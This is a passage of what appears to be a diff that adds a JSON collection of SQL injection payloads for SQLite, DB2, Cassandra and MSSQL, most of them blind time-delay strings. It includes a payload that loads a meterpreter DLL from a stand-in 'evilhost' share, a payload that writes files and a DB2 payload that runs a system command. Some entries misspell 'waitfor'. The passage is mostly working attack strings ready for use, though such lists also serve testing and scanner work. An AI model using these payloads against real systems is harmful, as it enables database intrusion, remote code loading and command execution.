Comments" + } + }, + { + "payload": "CREATE TABLE lol.pwn (dataz text);", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "sqlite", + "severity": "medium", + "source": "SQLite Comments" + } + }, + { + "payload": "INSERT INTO lol.pwn (dataz) VALUES (\"\");--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "sqlite", + "severity": "medium", + "source": "SQLite Comments" + } + }, + { + "payload": "UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "sqlite", + "severity": "high", + "source": "SQLite Enumeration" + } + }, + { + "payload": "SELECT writefile('/path/to/file', column_name) FROM table_name", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "sqlite", + "severity": "medium", + "source": "SQLite String" + } + }, + { + "payload": "select xmlagg(xmlrow(table_schema)) from sysibm.tables", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "db2", + "severity": "medium", + "source": "DB2 Injection" + } + }, + { + "payload": "select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "db2", + "severity": "medium", + "source": "DB2 Injection" + } + }, + { + "payload": "select xml2clob(xmelement(name t, table_schema)) from sysibm.tables", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "db2", + "severity": "medium", + "source": "DB2 Injection" + } + }, + { + "payload": "' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "db2", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "db2", + "severity": "medium", + "source": "DB2 Comments" + } + }, + { + "payload": "username: admin' ALLOW FILTERING; %00", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "cassandra", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "username: admin'/*", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "cassandra", + "severity": "medium", + "source": "CQL Injection Limitations" + } + }, + { + "payload": "password: */and pass>'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "cassandra", + "severity": "medium", + "source": "CQL Injection Limitations" + } + }, + { + "payload": "SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "cassandra", + "severity": "medium", + "source": "Cassandra Comment" + } + }, + { + "payload": ")%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ")%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "')%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "')%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\")%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\")%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "))%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "))%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'))%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'))%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"))%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"))%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL)%20waifor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL)%20waifor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + 